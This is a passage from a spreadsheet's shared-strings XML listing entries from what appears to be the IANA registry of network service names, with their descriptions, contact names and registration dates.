    <t>mentaserver</t>
  </si>
  <si>
    <t>MENTASERVER</t>
  </si>
  <si>
    <t>[Ilan_Shlosberg]</t>
  </si>
  <si>
    <t>gsigatekeeper</t>
  </si>
  <si>
    <t>GSIGATEKEEPER</t>
  </si>
  <si>
    <t>[Steve_Tuecke]</t>
  </si>
  <si>
    <t>qencp</t>
  </si>
  <si>
    <t>Quick Eagle Networks CP</t>
  </si>
  <si>
    <t>[Santa_Dasu]</t>
  </si>
  <si>
    <t>scientia-ssdb</t>
  </si>
  <si>
    <t>SCIENTIA-SSDB</t>
  </si>
  <si>
    <t>caupc-remote</t>
  </si>
  <si>
    <t>CauPC Remote Control</t>
  </si>
  <si>
    <t>[Environics_Oy]</t>
  </si>
  <si>
    <t>gtp-control</t>
  </si>
  <si>
    <t>GTP-Control Plane (3GPP)</t>
  </si>
  <si>
    <t>[Alessio_Casati]</t>
  </si>
  <si>
    <t>elatelink</t>
  </si>
  <si>
    <t>ELATELINK</t>
  </si>
  <si>
    <t>[Tim_Lawrence]</t>
  </si>
  <si>
    <t>lockstep</t>
  </si>
  <si>
    <t>LOCKSTEP</t>
  </si>
  <si>
    <t>[Karl_Forster]</t>
  </si>
  <si>
    <t>pktcable-cops</t>
  </si>
  <si>
    <t>PktCable-COPS</t>
  </si>
  <si>
    <t>[Glenn_Russell]</t>
  </si>
  <si>
    <t>index-pc-wb</t>
  </si>
  <si>
    <t>INDEX-PC-WB</t>
  </si>
  <si>
    <t>[James_David_Fisher]</t>
  </si>
  <si>
    <t>net-steward</t>
  </si>
  <si>
    <t>Net Steward Control</t>
  </si>
  <si>
    <t>[Martin_Norman]</t>
  </si>
  <si>
    <t>cs-live</t>
  </si>
  <si>
    <t>cs-live.com</t>
  </si>
  <si>
    <t>[Matt_Lachance]</t>
  </si>
  <si>
    <t>xds</t>
  </si>
  <si>
    <t>XDS</t>
  </si>
  <si>
    <t>[Peter_Zurich]</t>
  </si>
  <si>
    <t>avantageb2b</t>
  </si>
  <si>
    <t>Avantageb2b</t>
  </si>
  <si>
    <t>[Avi_Software]</t>
  </si>
  <si>
    <t>solera-epmap</t>
  </si>
  <si>
    <t>SoleraTec End Point Map</t>
  </si>
  <si>
    <t>[Mark_Armstrong]</t>
  </si>
  <si>
    <t>zymed-zpp</t>
  </si>
  <si>
    <t>ZYMED-ZPP</t>
  </si>
  <si>
    <t>[Gregg_Welker]</t>
  </si>
  <si>
    <t>avenue</t>
  </si>
  <si>
    <t>AVENUE</t>
  </si>
  <si>
    <t>[Jason_Cater]</t>
  </si>
  <si>
    <t>gris</t>
  </si>
  <si>
    <t>Grid Resource Information Server</t>
  </si>
  <si>
    <t>appworxsrv</t>
  </si>
  <si>
    <t>APPWORXSRV</t>
  </si>
  <si>
    <t>[Fred_McLain]</t>
  </si>
  <si>
    <t>connect</t>
  </si>
  <si>
    <t>CONNECT</t>
  </si>
  <si>
    <t>[Reid_Ligon]</t>
  </si>
  <si>
    <t>unbind-cluster</t>
  </si>
  <si>
    <t>UNBIND-CLUSTER</t>
  </si>
  <si>
    <t>[Francois_Harvey]</t>
  </si>
  <si>
    <t>ias-auth</t>
  </si>
  <si>
    <t>IAS-AUTH</t>
  </si>
  <si>
    <t>ias-reg</t>
  </si>
  <si>
    <t>IAS-REG</t>
  </si>
  <si>
    <t>ias-admind</t>
  </si>
  <si>
    <t>IAS-ADMIND</t>
  </si>
  <si>
    <t>[Baiju_V_Patel]</t>
  </si>
  <si>
    <t>tdmoip</t>
  </si>
  <si>
    <t>TDM OVER IP</t>
  </si>
  <si>
    <t>[Yaakov_Stein]</t>
  </si>
  <si>
    <t>[RFC5087]</t>
  </si>
  <si>
    <t>lv-jc</t>
  </si>
  <si>
    <t>Live Vault Job Control</t>
  </si>
  <si>
    <t>lv-ffx</t>
  </si>
  <si>
    <t>Live Vault Fast Object Transfer</t>
  </si>
  <si>
    <t>lv-pici</t>
  </si>
  <si>
    <t>Live Vault Remote Diagnostic Console Support</t>
  </si>
  <si>
    <t>lv-not</t>
  </si>
  <si>
    <t>Live Vault Admin Event Notification</t>
  </si>
  <si>
    <t>lv-auth</t>
  </si>
  <si>
    <t>Live Vault Authentication</t>
  </si>
  <si>
    <t>[Ted_Hess]</t>
  </si>
  <si>
    <t>veritas-ucl</t>
  </si>
  <si>
    <t>VERITAS UNIVERSAL COMMUNICATION LAYER</t>
  </si>
  <si>
    <t>[Songlin_Ren]</t>
  </si>
  <si>
    <t>acptsys</t>
  </si>
  <si>
    <t>ACPTSYS</t>
  </si>
  <si>
    <t>[Michael_Lekias]</t>
  </si>
  <si>
    <t>dynamic3d</t>
  </si>
  <si>
    <t>DYNAMIC3D</t>
  </si>
  <si>
    <t>[Tobias_Wegner]</t>
  </si>
  <si>
    <t>docent</t>
  </si>
  <si>
    <t>DOCENT</t>
  </si>
  <si>
    <t>[Hali_Lindbloom]</t>
  </si>
  <si>
    <t>gtp-user</t>
  </si>
  <si>
    <t>GTP-User Plane (3GPP)</t>
  </si>
  <si>
    <t>ctlptc</t>
  </si>
  <si>
    <t>Control Protocol</t>
  </si>
  <si>
    <t>stdptc</t>
  </si>
  <si>
    <t>Standard Protocol</t>
  </si>
  <si>
    <t>brdptc</t>
  </si>
  <si>
    <t>Bridge Protocol</t>
  </si>
  <si>
    <t>[Hideki_Hatta]</t>
  </si>
  <si>
    <t>trp</t>
  </si>
  <si>
    <t>Talari Reliable Protocol</t>
  </si>
  <si>
    <t>[John_E_Dickey]</t>
  </si>
  <si>
    <t>xnds</t>
  </si>
  <si>
    <t>Xerox Network Document Scan Protocol</t>
  </si>
  <si>
    <t>[William_R_Lear]</t>
  </si>
  <si>
    <t>touchnetplus</t>
  </si>
  <si>
    <t>TouchNetPlus Service</t>
  </si>
  <si>
    <t>[Brian_Toothill]</t>
  </si>
  <si>
    <t>gdbremote</t>
  </si>
  <si>
    <t>GDB Remote Debug Port</t>
  </si>
  <si>
    <t>[Nigel_Stephens]</t>
  </si>
  <si>
    <t>apc-2160</t>
  </si>
  <si>
    <t>APC 2160</t>
  </si>
  <si>
    <t>[American_Power_Conve]</t>
  </si>
  <si>
    <t>apc-2161</t>
  </si>
  <si>
    <t>APC 2161</t>
  </si>
  <si>
    <t>navisphere</t>
  </si>
  <si>
    <t>Navisphere</t>
  </si>
  <si>
    <t>navisphere-sec</t>
  </si>
  <si>
    <t>Navisphere Secure</t>
  </si>
  <si>
    <t>[Andreas_Bauer]</t>
  </si>
  <si>
    <t>ddns-v3</t>
  </si>
  <si>
    <t>Dynamic DNS Version 3</t>
  </si>
  <si>
    <t>[Alan_Yates]</t>
  </si>
  <si>
    <t>x-bone-api</t>
  </si>
  <si>
    <t>X-Bone API</t>
  </si>
  <si>
    <t>iwserver</t>
  </si>
  <si>
    <t>[Fred_Surr]</t>
  </si>
  <si>
    <t>raw-serial</t>
  </si>
  <si>
    <t>Raw Async Serial Link</t>
  </si>
  <si>
    <t>[Benjamin_Green]</t>
  </si>
  <si>
    <t>easy-soft-mux</t>
  </si>
  <si>
    <t>easy-soft Multiplexer</t>
  </si>
  <si>
    <t>[Norbert_Kintzler]</t>
  </si>
  <si>
    <t>brain</t>
  </si>
  <si>
    <t>Backbone for Academic Information Notification (BRAIN)</t>
  </si>
  <si>
    <t>[Archishmat_Gore]</t>
  </si>
  <si>
    <t>eyetv</t>
  </si>
  <si>
    <t>EyeTV Server Port</t>
  </si>
  <si>
    <t>[Elgato_Systems]</t>
  </si>
  <si>
    <t>msfw-storage</t>
  </si>
  <si>
    <t>MS Firewall Storage</t>
  </si>
  <si>
    <t>msfw-s-storage</t>
  </si>
  <si>
    <t>MS Firewall SecureStorage</t>
  </si>
  <si>
    <t>msfw-replica</t>
  </si>
  <si>
    <t>MS Firewall Replication</t>
  </si>
  <si>
    <t>msfw-array</t>
  </si>
  <si>
    <t>MS Firewall Intra Array</t>
  </si>
  <si>
    <t>[Itai_Greenberg]</t>
  </si>
  <si>
    <t>airsync</t>
  </si>
  <si>
    <t>Microsoft Desktop AirSync Protocol</t>
  </si>
  <si>
    <t>rapi</t>
  </si>
  <si>
    <t>Microsoft ActiveSync Remote API</t>
  </si>
  <si>
    <t>[Jon_Xu]</t>
  </si>
  <si>
    <t>qwave</t>
  </si>
  <si>
    <t>qWAVE Bandwidth Estimate</t>
  </si>
  <si>
    <t>[Gabe_Frost]</t>
  </si>
  <si>
    <t>bitspeer</t>
  </si>
  <si>
    <t>Peer Services for BITS</t>
  </si>
  <si>
    <t>[Jeff_Roberts]</t>
  </si>
  <si>
    <t>vmrdp</t>
  </si>
  <si>
    <t>Microsoft RDP for virtual machines</t>
  </si>
  <si>
    <t>[Brian_Henry]</t>
  </si>
  <si>
    <t>2007-03</t>
  </si>
  <si>
    <t>mc-gt-srv</t>
  </si>
  <si>
    <t>Millicent Vendor Gateway Server</t>
  </si>
  <si>
    <t>eforward</t>
  </si>
  <si>
    <t>[Greg_Pringle]</t>
  </si>
  <si>
    <t>cgn-stat</t>
  </si>
  <si>
    <t>CGN status</t>
  </si>
  <si>
    <t>cgn-config</t>
  </si>
  <si>
    <t>Code Green configuration</t>
  </si>
  <si>
    <t>[Chris_Michaelson]</t>
  </si>
  <si>
    <t>nvd</t>
  </si>
  <si>
    <t>NVD User</t>
  </si>
  <si>
    <t>[Yves_Gattegno]</t>
  </si>
  <si>
    <t>2004-12</t>
  </si>
  <si>
    <t>onbase-dds</t>
  </si>
  <si>
    <t>OnBase Distributed Disk Services</t>
  </si>
  <si>
    <t>[Paul_Tam]</t>
  </si>
  <si>
    <t>gtaua</t>
  </si>
  <si>
    <t>Guy-Tek Automated Update Applications</t>
  </si>
  <si>
    <t>[Daniel_Story]</t>
  </si>
  <si>
    <t>ssmc</t>
  </si>
  <si>
    <t>Sepehr System Management Control</t>
  </si>
  <si>
    <t>ssmd</t>
  </si>
  <si>
    <t>Sepehr System Management Data</t>
  </si>
  <si>
    <t>[Shahriar_Pourazin]</t>
  </si>
  <si>
    <t>radware-rpm</t>
  </si>
  <si>
    <t>Radware Resource Pool Manager</t>
  </si>
  <si>
    <t>[Radware_LTD]</t>
  </si>
  <si>
    <t>[Samuel_Bercovici]</t>
  </si>
  <si>
    <t>radware-rpm-s</t>
  </si>
  <si>
    <t>Secure Radware Resource Pool Manager</t>
  </si>
  <si>
    <t>tivoconnect</t>
  </si>
  <si>
    <t>TiVoConnect Beacon</t>
  </si>
  <si>
    <t>[Jeffrey_J_Peters]</t>
  </si>
  <si>
    <t>tvbus</t>
  </si>
  <si>
    <t>TvBus Messaging</t>
  </si>
  <si>
    <t>[Brian_W_Beach]</t>
  </si>
  <si>
    <t>2003-01</t>
  </si>
  <si>
    <t>asdis</t>
  </si>
  <si>
    <t>ASDIS software management</t>
  </si>
  <si>
    <t>[ASDIS_Support]</t>
  </si>
  <si>
    <t>drwcs</t>
  </si>
  <si>
    <t>Dr.Web Enterprise Management Service</t>
  </si>
  <si>
    <t>[Eugeny_Gladkih]</t>
  </si>
  <si>
    <t>2194-2196</t>
  </si>
  <si>
    <t>Unauthorized Use Known on ports 2194-2196</t>
  </si>
  <si>
    <t>mnp-exchange</t>
  </si>
  <si>
    <t>MNP data exchange</t>
  </si>
  <si>
    <t>[Peter_Pramberger]</t>
  </si>
  <si>
    <t>onehome-remote</t>
  </si>
  <si>
    <t>OneHome Remote Access</t>
  </si>
  <si>
    <t>onehome-help</t>
  </si>
  <si>
    <t>OneHome Service Port</t>
  </si>
  <si>
    <t>[Jim_Herman]</t>
  </si>
  <si>
    <t>This entry has been removed on 2019-07-05.</t>
  </si>
  <si>
    <t>ats</t>
  </si>
  <si>
    <t>Advanced Training System Program</t>
  </si>
  <si>
    <t>imtc-map</t>
  </si>
  <si>
    <t>Int. Multimedia Teleconferencing Cosortium</t>
  </si>
  <si>
    <t>[Pat_Galvin]</t>
  </si>
  <si>
    <t>b2-runtime</t>
  </si>
  <si>
    <t>b2 Runtime Protocol</t>
  </si>
  <si>
    <t>b2-license</t>
  </si>
  <si>
    <t>b2 License Server</t>
  </si>
  <si>
    <t>[Helge_Frank_Zimpel]</t>
  </si>
  <si>
    <t>jps</t>
  </si>
  <si>
    <t>Java Presentation Server</t>
  </si>
  <si>
    <t>[Leif_Jakob]</t>
  </si>
  <si>
    <t>hpocbus</t>
  </si>
  <si>
    <t>HP OpenCall bus</t>
  </si>
  <si>
    <t>[Jerome_Forissier]</t>
  </si>
  <si>
    <t>hpssd</t>
  </si>
  <si>
    <t>HP Status and Services</t>
  </si>
  <si>
    <t>[Donald_Welch]</t>
  </si>
  <si>
    <t>2006-05</t>
  </si>
  <si>
    <t>hpiod</t>
  </si>
  <si>
    <t>HP I/O Backend</t>
  </si>
  <si>
    <t>[David_Suffield]</t>
  </si>
  <si>
    <t>rimf-ps</t>
  </si>
  <si>
    <t>HP RIM for Files Portal Service</t>
  </si>
  <si>
    <t>[Patty_Ho]</t>
  </si>
  <si>
    <t>2007-05</t>
  </si>
  <si>
    <t>noaaport</t>
  </si>
  <si>
    <t>NOAAPORT Broadcast Network</t>
  </si>
  <si>
    <t>emwin</t>
  </si>
  <si>
    <t>EMWIN</t>
  </si>
  <si>
    <t>[Antonio_Querubin]</t>
  </si>
  <si>
    <t>leecoposserver</t>
  </si>
  <si>
    <t>LeeCO POS Server Service</t>
  </si>
  <si>
    <t>[Patrick_Lee]</t>
  </si>
  <si>
    <t>kali</t>
  </si>
  <si>
    <t>Kali</t>
  </si>
  <si>
    <t>[Jay_Cotton]</t>
  </si>
  <si>
    <t>rpi</t>
  </si>
  <si>
    <t>RDQ Protocol Interface</t>
  </si>
  <si>
    <t>[Les_Mather]</t>
  </si>
  <si>
    <t>ipcore</t>
  </si>
  <si>
    <t>IPCore.co.za GPRS</t>
  </si>
  <si>
    <t>[Administrator]</t>
  </si>
  <si>
    <t>vtu-comms</t>
  </si>
  <si>
    <t>VTU data service</t>
  </si>
  <si>
    <t>[David_Barrass]</t>
  </si>
  <si>
    <t>gotodevice</t>
  </si>
  <si>
    <t>GoToDevice Device Management</t>
  </si>
  <si>
    <t>[John_Lisek]</t>
  </si>
  <si>
    <t>bounzza</t>
  </si>
  <si>
    <t>Bounzza IRC Proxy</t>
  </si>
  <si>
    <t>[Danko_Alexeyev]</t>
  </si>
  <si>
    <t>netiq-ncap</t>
  </si>
  <si>
    <t>NetIQ NCAP Protocol</t>
  </si>
  <si>
    <t>[Roger_Huebner]</t>
  </si>
  <si>
    <t>netiq</t>
  </si>
  <si>
    <t>NetIQ End2End</t>
  </si>
  <si>
    <t>[Michael_Sharpe]</t>
  </si>
  <si>
    <t>ethernet-ip-s</t>
  </si>
  <si>
    <t>EtherNet/IP over TLS</t>
  </si>
  <si>
    <t>[ODVA_Inc]</t>
  </si>
  <si>
    <t>[Brian_Batke_3]</t>
  </si>
  <si>
    <t>EtherNet/IP over DTLS</t>
  </si>
  <si>
    <t>EtherNet-IP-1</t>
  </si>
  <si>
    <t>EtherNet/IP I/O
IANA assigned this well-formed service name as a replacement for "EtherNet/IP-1".</t>
  </si>
  <si>
    <t>[Brian_Batke_2]</t>
  </si>
  <si>
    <t>New contact added for port 2222 on 2008-02-01</t>
  </si>
  <si>
    <t>EtherNet/IP-1</t>
  </si>
  <si>
    <t>EtherNet/IP I/O</t>
  </si>
  <si>
    <t>New contact added for port 2222 on 2008-02-01
This entry is an alias to "EtherNet-IP-1".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>rockwell-csp2</t>
  </si>
  <si>
    <t>Rockwell CSP2</t>
  </si>
  <si>
    <t>[Brian_Batke]</t>
  </si>
  <si>
    <t>efi-mg</t>
  </si>
  <si>
    <t>Easy Flexible Internet/Multiplayer Games</t>
  </si>
  <si>
    <t>[Thomas_Efer]</t>
  </si>
  <si>
    <t>rcip-itu</t>
  </si>
  <si>
    <t>Resource Connection Initiation Protocol</t>
  </si>
  <si>
    <t>[ITU_TSB]</t>
  </si>
  <si>
    <t>di-drm</t>
  </si>
  <si>
    <t>Digital Instinct DRM</t>
  </si>
  <si>
    <t>di-msg</t>
  </si>
  <si>
    <t>DI Messaging Service</t>
  </si>
  <si>
    <t>[Sean_Ni]</t>
  </si>
  <si>
    <t>ehome-ms</t>
  </si>
  <si>
    <t>eHome Message Server</t>
  </si>
  <si>
    <t>[Peter_Gabriel]</t>
  </si>
  <si>
    <t>datalens</t>
  </si>
  <si>
    <t>DataLens Service</t>
  </si>
  <si>
    <t>[Christopher_Bidwell]</t>
  </si>
  <si>
    <t>queueadm</t>
  </si>
  <si>
    <t>MetaSoft Job Queue Administration Service</t>
  </si>
  <si>
    <t>[Ilya_Melamed]</t>
  </si>
  <si>
    <t>2006-06</t>
  </si>
  <si>
    <t>wimaxasncp</t>
  </si>
  <si>
    <t>WiMAX ASN Control Plane Protocol</t>
  </si>
  <si>
    <t>[Prakash_Iyer]</t>
  </si>
  <si>
    <t>ivs-video</t>
  </si>
  <si>
    <t>IVS Video default</t>
  </si>
  <si>
    <t>[Thierry_Turletti]</t>
  </si>
  <si>
    <t>infocrypt</t>
  </si>
  <si>
    <t>INFOCRYPT</t>
  </si>
  <si>
    <t>[Erica_Liu]</t>
  </si>
  <si>
    <t>directplay</t>
  </si>
  <si>
    <t>DirectPlay</t>
  </si>
  <si>
    <t>[Ajay_Jindal]</t>
  </si>
  <si>
    <t>sercomm-wlink</t>
  </si>
  <si>
    <t>Sercomm-WLink</t>
  </si>
  <si>
    <t>[Melinda_Tsao]</t>
  </si>
  <si>
    <t>nani</t>
  </si>
  <si>
    <t>Nani</t>
  </si>
  <si>
    <t>[Steve_Benoit]</t>
  </si>
  <si>
    <t>optech-port1-lm</t>
  </si>
  <si>
    <t>Optech Port1 License Manager</t>
  </si>
  <si>
    <t>[Gerard_Cannie]</t>
  </si>
  <si>
    <t>aviva-sna</t>
  </si>
  <si>
    <t>AVIVA SNA SERVER</t>
  </si>
  <si>
    <t>[Vick_Keshishian]</t>
  </si>
  <si>
    <t>imagequery</t>
  </si>
  <si>
    <t>Image Query</t>
  </si>
  <si>
    <t>[Charles_Jacobs]</t>
  </si>
  <si>
    <t>recipe</t>
  </si>
  <si>
    <t>RECIPe</t>
  </si>
  <si>
    <t>ivsd</t>
  </si>
  <si>
    <t>IVS Daemon</t>
  </si>
  <si>
    <t>foliocorp</t>
  </si>
  <si>
    <t>Folio Remote Server</t>
  </si>
  <si>
    <t>[Pat_Mcgowan]</t>
  </si>
  <si>
    <t>magicom</t>
  </si>
  <si>
    <t>Magicom Protocol</t>
  </si>
  <si>
    <t>[Yossi_Appleboum]</t>
  </si>
  <si>
    <t>nmsserver</t>
  </si>
  <si>
    <t>NMS Server</t>
  </si>
  <si>
    <t>[Dmitry_Krasnonosenki]</t>
  </si>
  <si>
    <t>hao</t>
  </si>
  <si>
    <t>HaO</t>
  </si>
  <si>
    <t>[Panic_Ride]</t>
  </si>
  <si>
    <t>pc-mta-addrmap</t>
  </si>
  <si>
    <t>PacketCable MTA Addr Map</t>
  </si>
  <si>
    <t>[Dave_Maxwell]</t>
  </si>
  <si>
    <t>antidotemgrsvr</t>
  </si>
  <si>
    <t>Antidote Deployment Manager Service</t>
  </si>
  <si>
    <t>[Rod_Waltermann]</t>
  </si>
  <si>
    <t>ums</t>
  </si>
  <si>
    <t>User Management Service</t>
  </si>
  <si>
    <t>[Andrew_Crockford]</t>
  </si>
  <si>
    <t>rfmp</t>
  </si>
  <si>
    <t>RISO File Manager Protocol</t>
  </si>
  <si>
    <t>[Shinji_Yamanaka]</t>
  </si>
  <si>
    <t>remote-collab</t>
  </si>
  <si>
    <t>[Richard_Walters]</t>
  </si>
  <si>
    <t>dif-port</t>
  </si>
  <si>
    <t>Distributed Framework Port</t>
  </si>
  <si>
    <t>[Sebastien_Lambla]</t>
  </si>
  <si>
    <t>njenet-ssl</t>
  </si>
  <si>
    <t>NJENET using SSL</t>
  </si>
  <si>
    <t>[Hans_U_Schmidt]</t>
  </si>
  <si>
    <t>dtv-chan-req</t>
  </si>
  <si>
    <t>DTV Channel Request</t>
  </si>
  <si>
    <t>[Richard_Hodges]</t>
  </si>
  <si>
    <t>seispoc</t>
  </si>
  <si>
    <t>Seismic P.O.C. Port</t>
  </si>
  <si>
    <t>[Robert_Reimiller]</t>
  </si>
  <si>
    <t>vrtp</t>
  </si>
  <si>
    <t>VRTP - ViRtue Transfer Protocol</t>
  </si>
  <si>
    <t>[Max_Fudim]</t>
  </si>
  <si>
    <t>pcc-mfp</t>
  </si>
  <si>
    <t>PCC MFP</t>
  </si>
  <si>
    <t>[Kunihiko_Morota]</t>
  </si>
  <si>
    <t>simple-tx-rx</t>
  </si>
  <si>
    <t>simple text/file transfer</t>
  </si>
  <si>
    <t>[Daniel_Kilsdonk]</t>
  </si>
  <si>
    <t>2006-08</t>
  </si>
  <si>
    <t>rcts</t>
  </si>
  <si>
    <t>Rotorcraft Communications Test System</t>
  </si>
  <si>
    <t>[Terry_Eldridge]</t>
  </si>
  <si>
    <t>apc-2260</t>
  </si>
  <si>
    <t>APC 2260</t>
  </si>
  <si>
    <t>comotionmaster</t>
  </si>
  <si>
    <t>CoMotion Master Server</t>
  </si>
  <si>
    <t>comotionback</t>
  </si>
  <si>
    <t>CoMotion Backup Server</t>
  </si>
  <si>
    <t>[Friedman_Wagner_Dobl]</t>
  </si>
  <si>
    <t>ecwcfg</t>
  </si>
  <si>
    <t>ECweb Configuration Service</t>
  </si>
  <si>
    <t>[Anders_Hjelm]</t>
  </si>
  <si>
    <t>apx500api-1</t>
  </si>
  <si>
    <t>Audio Precision Apx500 API Port 1</t>
  </si>
  <si>
    <t>apx500api-2</t>
  </si>
  <si>
    <t>Audio Precision Apx500 API Port 2</t>
  </si>
  <si>
    <t>[Robert_Wright]</t>
  </si>
  <si>
    <t>mfserver</t>
  </si>
  <si>
    <t>M-Files Server</t>
  </si>
  <si>
    <t>[Samppa_Lahtinen]</t>
  </si>
  <si>
    <t>2004-06</t>
  </si>
  <si>
    <t>M-files Server</t>
  </si>
  <si>
    <t>ontobroker</t>
  </si>
  <si>
    <t>OntoBroker</t>
  </si>
  <si>
    <t>[Dr_Michael_Erdmann]</t>
  </si>
  <si>
    <t>amt</t>
  </si>
  <si>
    <t>AMT</t>
  </si>
  <si>
    <t>[RFC7450]</t>
  </si>
  <si>
    <t>mikey</t>
  </si>
  <si>
    <t>MIKEY</t>
  </si>
  <si>
    <t>[Karl_Norrman]</t>
  </si>
  <si>
    <t>starschool</t>
  </si>
  <si>
    <t>starSchool</t>
  </si>
  <si>
    <t>[Adam_Ernst]</t>
  </si>
  <si>
    <t>mmcals</t>
  </si>
  <si>
    <t>Secure Meeting Maker Scheduling</t>
  </si>
  <si>
    <t>mmcal</t>
  </si>
  <si>
    <t>Meeting Maker Scheduling</t>
  </si>
  <si>
    <t>[Andrew_H_Derbyshire]</t>
  </si>
  <si>
    <t>mysql-im</t>
  </si>
  <si>
    <t>MySQL Instance Manager</t>
  </si>
  <si>
    <t>[Petr_Chardin]</t>
  </si>
  <si>
    <t>pcttunnell</t>
  </si>
  <si>
    <t>PCTTunneller</t>
  </si>
  <si>
    <t>[ProControl_Technolog]</t>
  </si>
  <si>
    <t>ibridge-data</t>
  </si>
  <si>
    <t>iBridge Conferencing</t>
  </si>
  <si>
    <t>ibridge-mgmt</t>
  </si>
  <si>
    <t>iBridge Management</t>
  </si>
  <si>
    <t>[Patrick_Fisher]</t>
  </si>
  <si>
    <t>bluectrlproxy</t>
  </si>
  <si>
    <t>Bt device control proxy</t>
  </si>
  <si>
    <t>[Mark_de_Rooi]</t>
  </si>
  <si>
    <t>s3db</t>
  </si>
  <si>
    <t>Simple Stacked Sequences Database</t>
  </si>
  <si>
    <t>[David_Brandon]</t>
  </si>
  <si>
    <t>xmquery</t>
  </si>
  <si>
    <t>[Niels_Christiansen]</t>
  </si>
  <si>
    <t>lnvpoller</t>
  </si>
  <si>
    <t>LNVPOLLER</t>
  </si>
  <si>
    <t>lnvconsole</t>
  </si>
  <si>
    <t>LNVCONSOLE</t>
  </si>
  <si>
    <t>lnvalarm</t>
  </si>
  <si>
    <t>LNVALARM</t>
  </si>
  <si>
    <t>lnvstatus</t>
  </si>
  <si>
    <t>LNVSTATUS</t>
  </si>
  <si>
    <t>lnvmaps</t>
  </si>
  <si>
    <t>LNVMAPS</t>
  </si>
  <si>
    <t>lnvmailmon</t>
  </si>
  <si>
    <t>LNVMAILMON</t>
  </si>
  <si>
    <t>[John_Payne]</t>
  </si>
  <si>
    <t>nas-metering</t>
  </si>
  <si>
    <t>NAS-Metering</t>
  </si>
  <si>
    <t>[Steven_Sawkins]</t>
  </si>
  <si>
    <t>dna</t>
  </si>
  <si>
    <t>DNA</t>
  </si>
  <si>
    <t>[Tung_Nguyen]</t>
  </si>
  <si>
    <t>netml</t>
  </si>
  <si>
    <t>NETML</t>
  </si>
  <si>
    <t>[Jochen_Hansmeyer]</t>
  </si>
  <si>
    <t>dict-lookup</t>
  </si>
  <si>
    <t>Lookup dict server</t>
  </si>
  <si>
    <t>[William_Fernando_Mat]</t>
  </si>
  <si>
    <t>2005-01</t>
  </si>
  <si>
    <t>sonus-logging</t>
  </si>
  <si>
    <t>Sonus Logging Services</t>
  </si>
  <si>
    <t>[Adwait_Sathe]</t>
  </si>
  <si>
    <t>eapsp</t>
  </si>
  <si>
    <t>EPSON Advanced Printer Share Protocol</t>
  </si>
  <si>
    <t>[SEIKO_EPSON]</t>
  </si>
  <si>
    <t>mib-streaming</t>
  </si>
  <si>
    <t>Sonus Element Management Services</t>
  </si>
  <si>
    <t>[Linda_Lin]</t>
  </si>
  <si>
    <t>npdbgmngr</t>
  </si>
  <si>
    <t>Network Platform Debug Manager</t>
  </si>
  <si>
    <t>[Robert_Byrne]</t>
  </si>
  <si>
    <t>2006-09</t>
  </si>
  <si>
    <t>konshus-lm</t>
  </si>
  <si>
    <t>Konshus License Manager (FLEX)</t>
  </si>
  <si>
    <t>[Francois_Painchaud]</t>
  </si>
  <si>
    <t>advant-lm</t>
  </si>
  <si>
    <t>Advant License Manager</t>
  </si>
  <si>
    <t>[Lars_Goran_Magnusson]</t>
  </si>
  <si>
    <t>theta-lm</t>
  </si>
  <si>
    <t>Theta License Manager (Rainbow)</t>
  </si>
  <si>
    <t>[David_Thompson]</t>
  </si>
  <si>
    <t>d2k-datamover1</t>
  </si>
  <si>
    <t>D2K DataMover 1</t>
  </si>
  <si>
    <t>d2k-datamover2</t>
  </si>
  <si>
    <t>D2K DataMover 2</t>
  </si>
  <si>
    <t>[Eric_Lan]</t>
  </si>
  <si>
    <t>pc-telecommute</t>
  </si>
  <si>
    <t>PC Telecommute</t>
  </si>
  <si>
    <t>[John_Daniel_Bonamico]</t>
  </si>
  <si>
    <t>cvmmon</t>
  </si>
  <si>
    <t>CVMMON</t>
  </si>
  <si>
    <t>[Roger_Kumpf]</t>
  </si>
  <si>
    <t>cpq-wbem</t>
  </si>
  <si>
    <t>Compaq HTTP</t>
  </si>
  <si>
    <t>[Scott_Shaffer]</t>
  </si>
  <si>
    <t>binderysupport</t>
  </si>
  <si>
    <t>Bindery Support</t>
  </si>
  <si>
    <t>[Narasimha_Rao_N]</t>
  </si>
  <si>
    <t>proxy-gateway</t>
  </si>
  <si>
    <t>Proxy Gateway</t>
  </si>
  <si>
    <t>[Paul_Funk]</t>
  </si>
  <si>
    <t>attachmate-uts</t>
  </si>
  <si>
    <t>Attachmate UTS</t>
  </si>
  <si>
    <t>[George_Gianelos]</t>
  </si>
  <si>
    <t>mt-scaleserver</t>
  </si>
  <si>
    <t>MT ScaleServer</t>
  </si>
  <si>
    <t>[Paul_Glaubitz]</t>
  </si>
  <si>
    <t>tappi-boxnet</t>
  </si>
  <si>
    <t>TAPPI BoxNet</t>
  </si>
  <si>
    <t>[Richard_Spartz]</t>
  </si>
  <si>
    <t>pehelp</t>
  </si>
  <si>
    <t>[Jens_Kilian]</t>
  </si>
  <si>
    <t>sdhelp</t>
  </si>
  <si>
    <t>[Annette_Klecha]</t>
  </si>
  <si>
    <t>sdserver</t>
  </si>
  <si>
    <t>SD Server</t>
  </si>
  <si>
    <t>sdclient</t>
  </si>
  <si>
    <t>SD Client</t>
  </si>
  <si>
    <t>[Jeurgen_Broesamle]</t>
  </si>
  <si>
    <t>messageservice</t>
  </si>
  <si>
    <t>Message Service</t>
  </si>
  <si>
    <t>wanscaler</t>
  </si>
  <si>
    <t>WANScaler Communication Service</t>
  </si>
  <si>
    <t>[Allen_Samuels]</t>
  </si>
  <si>
    <t>2006-11</t>
  </si>
  <si>
    <t>iapp</t>
  </si>
  <si>
    <t>IAPP (Inter Access Point Protocol)</t>
  </si>
  <si>
    <t>[Henri_Moelard]</t>
  </si>
  <si>
    <t>cr-websystems</t>
  </si>
  <si>
    <t>CR WebSystems</t>
  </si>
  <si>
    <t>[Robin_Giese]</t>
  </si>
  <si>
    <t>precise-sft</t>
  </si>
  <si>
    <t>Precise Sft.</t>
  </si>
  <si>
    <t>[Michael_Landwehr]</t>
  </si>
  <si>
    <t>sent-lm</t>
  </si>
  <si>
    <t>SENT License Manager</t>
  </si>
  <si>
    <t>[Pisharath_Krishnan]</t>
  </si>
  <si>
    <t>attachmate-g32</t>
  </si>
  <si>
    <t>Attachmate G32</t>
  </si>
  <si>
    <t>[Bryce_Bhatnagar]</t>
  </si>
  <si>
    <t>cadencecontrol</t>
  </si>
  <si>
    <t>Cadence Control</t>
  </si>
  <si>
    <t>[Buck_Caldwell]</t>
  </si>
  <si>
    <t>infolibria</t>
  </si>
  <si>
    <t>InfoLibria</t>
  </si>
  <si>
    <t>[Chris_Chiotasso]</t>
  </si>
  <si>
    <t>siebel-ns</t>
  </si>
  <si>
